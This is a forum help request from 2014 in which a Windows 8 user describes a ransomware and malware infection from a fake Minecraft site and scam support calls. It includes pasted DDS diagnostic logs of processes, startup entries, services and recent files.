Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

multiple conhost.exe processes high CPU usage powershell repeatedly stops


  • This topic is locked This topic is locked
17 replies to this topic

#1 JeremyAndrew

JeremyAndrew

  • Members
  • 12 posts
  • OFFLINE
  •  
  • Local time:05:47 PM

Posted 13 October 2014 - 05:05 PM

Hi.  I downloaded some stuff from a bogus Minecraft site and have had multiple problems since.  Everything got encrypted, but I didn't pay cuz I had copies, then I had multiple comsurrogate processes, and now I hav e high CPU usage, a program called "conhost.exe" that doesn't have a valid file location or service associated with it, and various programs spike randomly to 20% -30% cpu usage, keeping me in the 70 - 80% range.  Additionally, since I got the encryption virus, powershell stops working every few minutes.  And some computer company who says they are a "legitimate company" has been calling me and they want me to connect to their server through the run command line. 

I am running Windows 8.1

I have followed a couple fix threads and at various times have run rogue killer, emisoft and a couple others. Found some viruses, but still have the above problems.

I ran DDS and got the following logs:

 

DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 10.0.9200.16537
Run by Jeremy and Heidi at 10:25:18 on 2014-10-13
Microsoft Windows 8  6.2.9200.0.1252.1.1033.18.11741.9074 [GMT -7:00]
.
AV: AVG AntiVirus Free Edition 2014 *Enabled/Updated* {0E9420C4-06B3-7FA0-3AB1-6E49CB52ECD9}
AV: Emsisoft Anti-Malware *Enabled/Updated* {8504DEEF-CC04-1F76-2137-F1A5F4A659DA}
AV: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Emsisoft Anti-Malware *Enabled/Updated* {3E653F0B-EA3E-10F8-1B87-CAD78F211367}
SP: AVG AntiVirus Free Edition 2014 *Enabled/Updated* {B5F5C120-2089-702E-0001-553BB0D5A664}
.
============== Running Processes ===============
.
c:\PROGRA~2\AVG\AVG2014\avgrsa.exe
C:\Program Files (x86)\AVG\AVG2014\avgcsrva.exe
C:\windows\system32\svchost.exe -k DcomLaunch
C:\windows\system32\svchost.exe -k RPCSS
C:\windows\system32\atiesrxx.exe
C:\windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\windows\system32\dwm.exe
C:\windows\system32\svchost.exe -k netsvcs
C:\windows\system32\svchost.exe -k LocalService
C:\windows\system32\atieclxx.exe
C:\Program Files (x86)\Emsisoft Anti-Malware\a2service.exe
C:\windows\Explorer.EXE
C:\windows\system32\svchost.exe -k NetworkService
C:\Program Files (x86)\Toshiba\Password Utility\GFNEXSrv.exe
C:\windows\System32\spoolsv.exe
C:\windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files (x86)\AVG\AVG2014\avgidsagent.exe
C:\Program Files (x86)\AVG\AVG2014\avgwdsvc.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files (x86)\Hp\Common\HPSupportSolutionsFrameworkService.exe
C:\windows\system32\taskhostex.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\windows\system32\svchost.exe -k imgsvc
C:\Windows\system32\TODDSrv.exe
C:\Program Files\Toshiba\Teco\TecoService.exe
C:\Program Files (x86)\AVG\AVG2014\avgnsa.exe
C:\Program Files (x86)\AVG\AVG2014\avgemca.exe
C:\windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\PROGRAM FILES\SYNAPTICS\SYNTP\SYNTPHELPER.EXE
C:\windows\System32\svchost.exe -k LocalServicePeerNet
C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
C:\Program Files\Toshiba\Hotkey\TCrdMain_Win8.exe
C:\Program Files\Toshiba\Teco\TecoResident.exe
C:\Program Files (x86)\Toshiba\System Setting\TSleepSrv.exe
C:\windows\system32\wbem\wmiprvse.exe
C:\windows\system32\wbem\unsecapp.exe
C:\Program Files (x86)\AVG\AVG2014\avgui.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\Program Files (x86)\Emsisoft Anti-Malware\a2guard.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files\TOSHIBA\Toshiba Service Station\ToshibaServiceStation.exe
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\Program Files\TOSHIBA\TPHM\TPCHSrv.exe
C:\Program Files\TOSHIBA\TPHM\TPCHWMsg.exe
C:\Program Files (x86)\AVG\AVG2014\avgcsrva.exe
C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
C:\windows\system32\SearchIndexer.exe
C:\windows\system32\SearchProtocolHost.exe
C:\windows\system32\svchost.exe -k LocalSystemNetworkRestricted
C:\windows\system32\dashost.exe
C:\Program Files\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe
C:\windows\system32\WLANExt.exe
C:\Program Files (x86)\AVG\AVG2014\avgcfgex.exe
C:\windows\system32\taskmgr.exe
C:\Program Files (x86)\Windows Live\Mail\wlmail.exe
C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
C:\windows\system32\rundll32.exe
C:\windows\system32\SearchProtocolHost.exe
C:\windows\system32\SearchFilterHost.exe
C:\windows\system32\wbem\wmiprvse.exe
C:\windows\syswow64\windowspowershell\v1.0\powershell.exe
C:\windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://www.google.com/
uDefault_Page_URL = hxxp://toshiba13.msn.com
mStart Page = hxxp://speedial.com/?f=1&a=spd_wnzp_14_23_ie&cd=2XzuyEtN2Y1L1QzuyBtDyDyE0DtBtCtCtCzytB0AyD0EyCyBtN0D0Tzu0SzzzzyCtN1L2XzutBtFtBtDtFtCzytFtDtN1L1CzutCyEtBzytDyD1V1TtN1L1G1B1V1N2Y1L1Qzu2SyEzy0EtC0FzytAyCtG0E0FyEtAtG0DtCyBtCtGtAyByEtDtGyC0CyDtAyE0BzyyEtB0AzztB2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyDtC0B0E0E0Bzz0FtG0C0DyCtDtGtDzzzz0FtGzz0DtBzztGyDzztDtDyEyC0D0DtDyC0FyB2Q&cr=1057173731&ir=
mWindow Title = Internet Explorer provided by TOSHIBA
mDefault_Page_URL = hxxp://toshiba13.msn.com
uURLSearchHooks: <No Name>: {a8625cb7-85fe-4936-92a4-b2a7c925209e} -
mWinlogon: Userinit = userinit.exe
BHO: Adobe PDF Link Helper: {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
BHO: Toolbar BHO: {7c8f8fe5-9785-4f74-bcf8-895ef9752d97} -
BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL
TB: GamingWonderland: {A899079D-206F-43A6-BE6A-07E0FA648EA0} -
TB: GamingWonderland: {a899079d-206f-43a6-be6a-07e0fa648ea0} -
mRun: [ToshibaAppPlace] "C:\Program Files (x86)\Toshiba\Toshiba App Place\ToshibaAppPlace.exe"
mRun: [StartCCC] "C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" MSRun
mRun: [AVG_UI] "C:\Program Files (x86)\AVG\AVG2014\avgui.exe" /TRAYONLY
mRun: [APSDaemon] "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
mRun: [iTunesHelper] "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
mRun: [GamingWonderland EPM Support] "C:\PROGRA~2\GAMING~2\bar\1.bin\gtmedint.exe" T8EPMSUP.DLL,S
mRun: [GamingWonderland Search Scope Monitor] "C:\PROGRA~2\GAMING~2\bar\1.bin\gtsrchmn.exe" /m=2 /w /h
mRun: [GamingWonderland Browser Plugin Loader] C:\PROGRA~2\GAMING~2\bar\1.bin\gtbrmon.exe
mRun: [GamingWonderland Browser Plugin Loader 64] C:\PROGRA~2\GAMING~2\bar\1.bin\gtbrmon64.exe
mRun: [Nikon Message Center 2] C:\Program Files (x86)\Nikon\Nikon Message Center 2\NkMC2.exe -s
mRun: [Zwinky_5q Browser Plugin Loader 64] C:\PROGRA~2\ZWINKY~2\bar\1.bin\5qbrmon64.exe
mRun: [emsisoft anti-malware] "c:\program files (x86)\emsisoft anti-malware\a2guard.exe" /d=60
StartupFolder: C:\Users\JEREMY~1\AppData\Roaming\MICROS~1\Windows\STARTM~1\Programs\Startup\ONENOT~1.LNK - C:\Program Files (x86)\Microsoft Office\Office14\ONENOTEM.EXE
IE: E&xport to Microsoft Excel - C:\PROGRA~2\MICROS~3\Office14\EXCEL.EXE/3000
IE: Se&nd to OneNote - C:\PROGRA~2\MICROS~3\Office14\ONBttnIE.dll/105
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
TCP: NameServer = 192.168.1.1
TCP: Interfaces\{0B80CC8A-C89E-4626-B352-4EE0D20966A2} : DHCPNameServer = 192.168.1.1
TCP: Interfaces\{D8242372-24C5-44A4-A62B-9655F83D954D} : DHCPNameServer = 192.168.1.1
TCP: Interfaces\{D8242372-24C5-44A4-A62B-9655F83D954D}\1627368646561636F6E6 : DHCPNameServer = 64.68.252.10 64.68.248.10 64.68.244.250
TCP: Interfaces\{D8242372-24C5-44A4-A62B-9655F83D954D}\D4F64756C60263 : DHCPNameServer = 10.128.128.128
TCP: Interfaces\{D8242372-24C5-44A4-A62B-9655F83D954D}\E45445745414254373 : DHCPNameServer = 10.0.0.1
Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
SSODL: WebCheck - <orphaned>
x64-mStart Page = hxxp://speedial.com/?f=1&a=spd_wnzp_14_23_ie&cd=2XzuyEtN2Y1L1QzuyBtDyDyE0DtBtCtCtCzytB0AyD0EyCyBtN0D0Tzu0SzzzzyCtN1L2XzutBtFtBtDtFtCzytFtDtN1L1CzutCyEtBzytDyD1V1TtN1L1G1B1V1N2Y1L1Qzu2SyEzy0EtC0FzytAyCtG0E0FyEtAtG0DtCyBtCtGtAyByEtDtGyC0CyDtAyE0BzyyEtB0AzztB2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyDtC0B0E0E0Bzz0FtG0C0DyCtDtGtDzzzz0FtGzz0DtBzztGyDzztDtDyEyC0D0DtDyC0FyB2Q&cr=1057173731&ir=
x64-mWindow Title = Internet Explorer provided by TOSHIBA
x64-mDefault_Page_URL = hxxp://toshiba13.msn.com
x64-BHO: Java™ Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre7\bin\ssv.dll
x64-BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL
x64-BHO: Java™ Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre7\bin\jp2ssv.dll
x64-Run: [RtHDVCpl] C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s
x64-Run: [SRS Premium Sound HD] "C:\Program Files\SRS Labs\SRS Control Panel\SRSPanel_64.exe"  /f="C:\Program Files\SRS Labs\SRS Control Panel\SRS_Premium_Sound_HD.zip" /h
x64-Run: [TCrdMain] C:\Program Files (x86)\TOSHIBA\Hotkey\TCrdMain_Win8.exe
x64-Run: [TecoResident] C:\Program Files\TOSHIBA\Teco\TecoResident.exe
x64-Run: [TosWaitSrv] C:\Program Files (x86)\TOSHIBA\TPHM\TosWaitSrv.exe
x64-Run: [TSleepSrv] C:\Program Files (x86)\TOSHIBA\System Setting\TSleepSrv.exe
x64-Run: [TODDMain] C:\Program Files (x86)\TOSHIBA\System Setting\TODDMain.exe
x64-IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll
x64-IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
x64-Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
x64-Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - <orphaned>
x64-SSODL: WebCheck - <orphaned>
.
============= SERVICES / DRIVERS ===============
.
R0 AVGIDSHA;AVGIDSHA;C:\windows\System32\Drivers\avgidsha.sys [2014-6-17 190744]
R0 Avgloga;AVG Logging Driver;C:\windows\System32\Drivers\avgloga.sys [2014-6-17 328984]
R0 Avgmfx64;AVG Mini-Filter Resident Anti-Virus Shield;C:\windows\System32\Drivers\avgmfx64.sys [2014-8-6 123672]
R0 Avgrkx64;AVG Anti-Rootkit Driver;C:\windows\System32\Drivers\avgrkx64.sys [2014-6-17 31512]
R0 tos_sps64;TOSHIBA tos_sps64 Service;C:\windows\System32\Drivers\tos_sps64.sys [2012-10-25 499096]
R1 A2DDA;A2 Direct Disk Access Support Driver;C:\Program Files (x86)\Emsisoft Anti-Malware\a2ddax64.sys [2014-10-2 26176]
R1 a2injectiondriver;a2injectiondriver;C:\Program Files (x86)\Emsisoft Anti-Malware\a2dix64.sys [2014-10-2 45208]
R1 a2util;a-squared Malware-IDS utility driver;C:\Program Files (x86)\Emsisoft Anti-Malware\a2util64.sys [2014-10-2 23088]
R1 Avgdiska;AVG Disk Driver;C:\windows\System32\Drivers\avgdiska.sys [2014-6-30 152344]
R1 AVGIDSDriver;AVGIDSDriver;C:\windows\System32\Drivers\avgidsdrivera.sys [2014-7-21 244504]
R1 Avgldx64;AVG AVI Loader Driver;C:\windows\System32\Drivers\avgldx64.sys [2014-6-17 235800]
R1 Avgwfpa;AVG Firewall Driver;C:\windows\System32\Drivers\avgwfpa.sys [2014-6-30 270104]
R2 a2AntiMalware;Emsisoft Protection Service;C:\Program Files (x86)\Emsisoft Anti-Malware\a2service.exe [2014-10-2 4791872]
R2 AMD External Events Utility;AMD External Events Utility;C:\windows\System32\atiesrxx.exe [2012-8-8 240640]
R2 APXACC;AppEx Networks Accelerator LWF;C:\windows\System32\Drivers\appexDrv.sys [2012-10-25 199008]
R2 AVGIDSAgent;AVGIDSAgent;C:\Program Files (x86)\AVG\AVG2014\avgidsagent.exe [2014-8-25 3242000]
R2 avgwd;AVG WatchDog;C:\Program Files (x86)\AVG\AVG2014\avgwdsvc.exe [2014-8-25 289328]
R2 GFNEXSrv;GFNEX Service;C:\Program Files (x86)\Toshiba\Password Utility\GFNEXSrv.exe [2011-10-13 156672]
R2 HPSupportSolutionsFrameworkService;HP Support Solutions Framework Service;C:\Program Files (x86)\HP\Common\HPSupportSolutionsFrameworkService.exe [2014-9-15 89352]
R2 PEGAGFN;PEGAGFN;C:\Program Files (x86)\Toshiba\Password Utility\PEGAGFN.sys [2009-9-11 14344]
R2 TOSHIBA eco Utility Service;TOSHIBA eco Utility Service;C:\Program Files\Toshiba\Teco\TecoService.exe [2012-8-13 289192]
R2 TVALZFL;TOSHIBA ACPI-Based Value Added Logical and General Purpose Device Filter Driver;C:\windows\System32\Drivers\TVALZFL.sys [2012-7-21 16768]
R3 a2acc;a2acc;C:\Program Files (x86)\Emsisoft Anti-Malware\a2accx64.sys [2014-10-2 71472]
R3 AtiHDAudioService;AMD Function Driver for HD Audio Service;C:\windows\System32\Drivers\AtihdW86.sys [2012-7-17 98472]
R3 cleanhlp;cleanhlp;C:\Program Files (x86)\Emsisoft Anti-Malware\cleanhlp64.sys [2014-10-2 57024]
R3 RSUSBSTOR;RtsUStor.Sys Realtek USB Card Reader;C:\windows\System32\Drivers\RtsUStor.sys [2012-10-25 252048]
R3 RTL8168;Realtek 8168 NT Driver;C:\windows\System32\Drivers\Rt630x64.sys [2012-10-25 690832]
R3 RTWlanE;Realtek Wireless LAN 802.11n PCI-E Network Adapter;C:\windows\System32\Drivers\rtwlane.sys [2012-6-29 1496720]
R3 TMachInfo;TMachInfo;C:\Program Files\Toshiba\TOSHIBA Service Station\TMachInfo.exe [2013-7-31 53864]
R3 TPCHSrv;TPCH Service;C:\Program Files\Toshiba\TPHM\TPCHSrv.exe [2012-7-28 458152]
R3 usbfilter;AMD USB Filter Driver;C:\windows\System32\Drivers\usbfilter.sys [2012-10-25 57000]
S0 Avgboota;AVG Early Launch Anti-Malware Driver;C:\windows\System32\Drivers\avgboota.sys [2013-9-4 20496]
S3 RTL8192Ce;Realtek Wireless LAN 802.11n PCI-E NIC Driver;C:\windows\System32\Drivers\rtwlane.sys [2012-6-29 1496720]
S3 USBAAPL64;Apple Mobile USB Driver;C:\windows\System32\Drivers\usbaapl64.sys [2013-3-18 54784]
S3 WUDFWpdMtp;WUDFWpdMtp;C:\windows\System32\Drivers\WUDFRd.sys [2012-7-25 198656]
.
=============== Created Last 30 ================
.
2014-10-10 15:22:39 -------- d-----w- C:\Program Files (x86)\GPLGS
2014-10-10 15:21:53 87600 ----a-w- C:\windows\System32\cpwmon64.dll
2014-10-10 15:21:41 -------- d-----w- C:\ProgramData\APN
2014-10-10 15:21:41 -------- d-----w- C:\Program Files (x86)\Acro Software
2014-10-09 16:55:22 -------- d-----w- C:\Users\Jeremy and Heidi\AppData\Local\Hewlett-Packard
2014-10-04 01:43:46 178800 ----a-w- C:\windows\SysWow64\CmdLineExt_x64.dll
2014-10-03 02:14:03 -------- d-----w- C:\ProgramData\Emsisoft
2014-10-02 19:16:08 -------- d-----w- C:\Program Files (x86)\Emsisoft Anti-Malware
2014-10-01 06:18:12 -------- d-----w- C:\Program Files (x86)\ASP
2014-10-01 06:18:10 16896 ----a-w- C:\windows\System32\sasnative64.exe
2014-10-01 06:17:57 -------- d-----w- C:\Users\Jeremy and Heidi\AppData\Local\Programs
2014-10-01 05:17:14 -------- d-----w- C:\windows\AppReadiness
2014-09-28 19:39:36 -------- d-----w- C:\Users\Jeremy and Heidi\AppData\Roaming\.minecraft
2014-09-23 03:50:48 144896 ----a-w- C:\windows\System32\tssdisai.dll
2014-09-23 03:50:47 148480 ----a-w- C:\windows\System32\poqexec.exe
2014-09-18 03:37:06 111016 ----a-w- C:\windows\System32\WindowsAccessBridge-64.dll
2014-09-18 02:30:45 -------- d-----w- C:\Users\Jeremy and Heidi\AppData\Roaming\.technic
2014-09-16 00:17:30 -------- d-----w- C:\windows\ERUNT
2014-09-15 23:24:31 705480 ----a-w- C:\windows\SysWow64\FlashPlayerApp.exe
2014-09-15 23:24:31 104904 ----a-w- C:\windows\SysWow64\FlashPlayerCPLApp.cpl
2014-09-15 18:48:40 71168 ----a-w- C:\windows\System32\drivers\hdaudbus.sys
2014-09-15 16:30:01 35480 ----a-w- C:\windows\SysWow64\TsWpfWrp.exe
2014-09-15 16:30:01 35480 ----a-w- C:\windows\System32\TsWpfWrp.exe
2014-09-14 11:28:22 -------- d-----w- C:\Users\Jeremy and Heidi\AppData\Roaming\Ucygemx
2014-09-14 02:47:02 -------- d--h--w- C:\dbc014f
.
==================== Find3M  ====================
.
2014-10-10 14:56:57 60 ----a-w- C:\windows\wpd99.drv
2014-09-29 19:47:56 19800 ----a-w- C:\windows\System32\roboot64.exe
2014-09-15 20:51:27 997632 ----a-w- C:\windows\System32\drivers\ndis.sys
2014-09-15 20:48:59 2219520 ----a-w- C:\windows\System32\dwmcore.dll
2014-09-15 20:34:52 159232 ----a-w- C:\windows\System32\inetpp.dll
2014-09-15 20:34:49 83968 ----a-w- C:\windows\SysWow64\wiaacmgr.exe
2014-09-15 20:34:47 436736 ----a-w- C:\windows\SysWow64\MP4SDECD.DLL
2014-09-15 20:34:45 1611776 ----a-w- C:\windows\SysWow64\mmc.exe
2014-09-15 20:34:43 666112 ----a-w- C:\windows\System32\MP4SDECD.DLL
2014-09-15 20:34:41 256000 ----a-w- C:\windows\System32\WSDMon.dll
2014-09-15 20:34:40 406016 ----a-w- C:\windows\System32\Windows.Media.dll
2014-09-15 20:34:38 91880 ----a-w- C:\windows\System32\drivers\partmgr.sys
2014-09-15 20:34:36 95232 ----a-w- C:\windows\System32\wiaacmgr.exe
2014-09-15 20:29:21 96600 ----a-w- C:\windows\System32\drivers\wfplwfs.sys
2014-09-15 20:29:21 723968 ----a-w- C:\windows\System32\BFE.DLL
2014-09-15 20:29:21 1160192 ----a-w- C:\windows\System32\IKEEXT.DLL
2014-09-15 20:25:08 3246592 ----a-w- C:\windows\System32\rdpcorets.dll
2014-09-15 20:25:08 235520 ----a-w- C:\windows\System32\rdpudd.dll
2014-09-15 20:23:47 619008 ----a-w- C:\windows\System32\drivers\srv2.sys
2014-09-15 20:23:45 309760 ----a-w- C:\windows\System32\wusa.exe
2014-09-15 20:23:43 305152 ----a-w- C:\windows\SysWow64\wusa.exe
2014-09-15 20:22:02 59392 ----a-w- C:\windows\SysWow64\imagehlp.dll
2014-09-15 20:22:00 62976 ----a-w- C:\windows\System32\imagehlp.dll
2014-09-15 20:20:38 652288 ----a-w- C:\windows\System32\comctl32.dll
2014-09-15 20:20:37 541696 ----a-w- C:\windows\SysWow64\comctl32.dll
2014-09-15 20:17:54 1557504 ----a-w- C:\windows\System32\osk.exe
2014-09-15 20:17:44 1440256 ----a-w- C:\windows\SysWow64\osk.exe
2014-09-15 20:12:23 452608 ----a-w- C:\windows\SysWow64\SHCore.dll
2014-09-15 20:12:20 1281536 ----a-w- C:\windows\System32\lsasrv.dll
2014-09-15 20:12:19 588288 ----a-w- C:\windows\System32\SHCore.dll
2014-09-15 20:12:16 439808 ----a-w- C:\windows\System32\lsm.dll
2014-09-15 20:06:25 626688 ----a-w- C:\windows\System32\resutils.dll
2014-09-15 20:06:25 374784 ----a-w- C:\windows\System32\clusapi.dll
2014-09-15 20:06:21 551424 ----a-w- C:\windows\SysWow64\oleaut32.dll
2014-09-15 20:06:15 488960 ----a-w- C:\windows\SysWow64\resutils.dll
2014-09-15 20:06:15 302080 ----a-w- C:\windows\SysWow64\clusapi.dll
2014-09-15 20:06:05 778752 ----a-w- C:\windows\System32\oleaut32.dll
2014-09-15 20:03:53 35856 ----a-w- C:\windows\System32\drivers\WdBoot.sys
2014-09-15 20:03:53 269592 ----a-w- C:\windows\System32\drivers\WdFilter.sys
2014-09-15 20:02:29 523776 ----a-w- C:\windows\SysWow64\vbscript.dll
2014-09-15 20:02:28 600064 ----a-w- C:\windows\System32\vbscript.dll
2014-09-15 19:55:26 1173504 ----a-w- C:\windows\System32\UIAutomationCore.dll
2014-09-15 19:55:17 247296 ----a-w- C:\windows\SysWow64\ubpm.dll
2014-09-15 19:55:14 61784 ----a-w- C:\windows\System32\drivers\crashdmp.sys
2014-09-15 19:55:11 13661696 ----a-w- C:\windows\System32\Windows.UI.Xaml.dll
2014-09-15 19:55:07 914432 ----a-w- C:\windows\SysWow64\UIAutomationCore.dll
2014-09-15 19:55:05 328192 ----a-w- C:\windows\System32\ubpm.dll
2014-09-15 19:55:04 465240 ----a-w- C:\windows\System32\drivers\fvevol.sys
2014-09-15 19:54:51 10799104 ----a-w- C:\windows\SysWow64\Windows.UI.Xaml.dll
2014-09-15 19:51:30 785624 ----a-w- C:\windows\System32\drivers\Wdf01000.sys
2014-09-15 19:51:30 54488 ----a-w- C:\windows\System32\drivers\WdfLdr.sys
2014-09-15 19:46:14 312832 ----a-w- C:\windows\System32\LocationApi.dll
2014-09-15 19:46:12 183808 ----a-w- C:\windows\System32\winmmbase.dll
2014-09-15 19:46:12 115712 ----a-w- C:\windows\System32\winmm.dll
2014-09-15 19:46:08 439488 ----a-w- C:\windows\System32\WerFault.exe
2014-09-15 19:46:06 120144 ----a-w- C:\windows\System32\drivers\msgpioclx.sys
2014-09-15 19:46:01 245760 ----a-w- C:\windows\SysWow64\LocationApi.dll
2014-09-15 19:39:37 245248 ----a-w- C:\windows\System32\usbmon.dll
2014-09-15 19:39:33 645120 ----a-w- C:\windows\System32\Windows.Security.Authentication.OnlineId.dll
2014-09-15 19:39:15 156160 ----a-w- C:\windows\System32\powercfg.cpl
2014-09-15 19:39:13 180224 ----a-w- C:\windows\System32\SystemEventsBrokerServer.dll
2014-09-15 19:39:09 357888 ----a-w- C:\windows\SysWow64\netcfgx.dll
2014-09-15 19:39:07 550912 ----a-w- C:\windows\SysWow64\drvstore.dll
2014-09-15 19:39:05 504320 ----a-w- C:\windows\SysWow64\Windows.Security.Authentication.OnlineId.dll
2014-09-15 19:39:02 1338880 ----a-w- C:\windows\SysWow64\WindowsCodecs.dll
2014-09-15 19:39:00 103936 ----a-w- C:\windows\System32\wpdbusenum.dll
2014-09-15 19:38:58 150016 ----a-w- C:\windows\System32\discan.dll
2014-09-15 19:38:51 951808 ----a-w- C:\windows\System32\Windows.Globalization.dll
2014-09-15 19:38:45 1149952 ----a-w- C:\windows\System32\winmde.dll
2014-09-15 19:38:42 1627648 ----a-w- C:\windows\System32\WindowsCodecs.dll
2014-09-15 19:38:27 117248 ----a-w- C:\windows\System32\NdisImPlatform.dll
2014-09-15 19:38:22 171008 ----a-w- C:\windows\System32\TimeBrokerServer.dll
2014-09-15 19:38:20 455168 ----a-w- C:\windows\System32\netcfgx.dll
2014-09-15 19:38:18 893952 ----a-w- C:\windows\SysWow64\winmde.dll
2014-09-15 19:38:15 145408 ----a-w- C:\windows\SysWow64\powercfg.cpl
2014-09-15 19:38:13 703488 ----a-w- C:\windows\System32\drvstore.dll
2014-09-15 19:38:01 1933312 ----a-w- C:\windows\System32\wbem\cimwin32.dll
2014-09-15 19:37:55 601088 ----a-w- C:\windows\SysWow64\Windows.Globalization.dll
2014-09-15 19:37:53 49152 ----a-w- C:\windows\System32\DevDispItemProvider.dll
2014-09-15 19:37:50 1101824 ----a-w- C:\windows\System32\wmpmde.dll
2014-09-15 19:37:47 71168 ----a-w- C:\windows\System32\WSDPrintProxy.DLL
2014-09-15 19:37:32 36352 ----a-w- C:\windows\SysWow64\DevDispItemProvider.dll
2014-09-15 19:32:17 1890816 ----a-w- C:\windows\System32\crypt32.dll
2014-09-15 19:32:15 1569280 ----a-w- C:\windows\SysWow64\crypt32.dll
2014-09-15 19:25:09 265216 ----a-w- C:\windows\System32\InkEd.dll
2014-09-15 19:20:03 1255936 ----a-w- C:\windows\System32\certutil.exe
2014-09-15 19:20:00 1013248 ----a-w- C:\windows\SysWow64\certutil.exe
2014-09-15 19:19:57 109056 ----a-w- C:\windows\SysWow64\cryptnet.dll
2014-09-15 19:19:55 141312 ----a-w- C:\windows\System32\cryptnet.dll
2014-09-15 18:44:53 35328 ----a-w- C:\windows\SysWow64\atmlib.dll
2014-09-15 18:44:53 300032 ----a-w- C:\windows\SysWow64\atmfd.dll
2014-09-15 18:44:49 46080 ----a-w- C:\windows\System32\atmlib.dll
2014-09-15 18:44:49 362496 ----a-w- C:\windows\System32\atmfd.dll
2014-09-15 18:39:16 475136 ----a-w- C:\windows\System32\WWanAPI.dll
2014-09-15 18:39:15 79360 ----a-w- C:\windows\SysWow64\taskkill.exe
2014-09-15 18:39:13 80896 ----a-w- C:\windows\SysWow64\tasklist.exe
2014-09-15 18:39:10 385024 ----a-w- C:\windows\System32\ncsi.dll
2014-09-15 18:39:09 567808 ----a-w- C:\windows\SysWow64\duser.dll
2014-09-15 18:39:01 375808 ----a-w- C:\windows\SysWow64\wbem\WmiPrvSE.exe
2014-09-15 18:39:01 131072 ----a-w- C:\windows\SysWow64\wbem\WmiDcPrv.dll
.
============= FINISH: 10:28:47.53 ===============
 

 

 

Here is the ATTACH file:

 

.
UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.
IF REQUESTED, ZIP IT UP & ATTACH IT
.
DDS (Ver_2012-11-20.01)
.
Microsoft Windows 8
Boot Device: \Device\HarddiskVolume2
Install Date: 12/18/2012 11:25:49 PM
System Uptime: 10/11/2014 10:17:15 PM (36 hours ago)
.
Motherboard: AMD |  | PLCSC8
Processor: AMD A6-4400M APU with Radeon™ HD Graphics    | Socket FT1 | 2700/100mhz
.
==== Disk Partitions =========================
.
C: is FIXED (NTFS) - 586 GiB total, 308.003 GiB free.
D: is CDROM ()
.
==== Disabled Device Manager Items =============
.
==== System Restore Points ===================
.
No restore point in system.
.
==== Installed Programs ======================
.
7-Zip 9.20 (x64 edition)
7-zip v9.20
Adobe Reader X (10.1.3)
AMD Accelerated Video Transcoding
AMD APP SDK Runtime
AMD Catalyst Install Manager
AMD Quick Stream
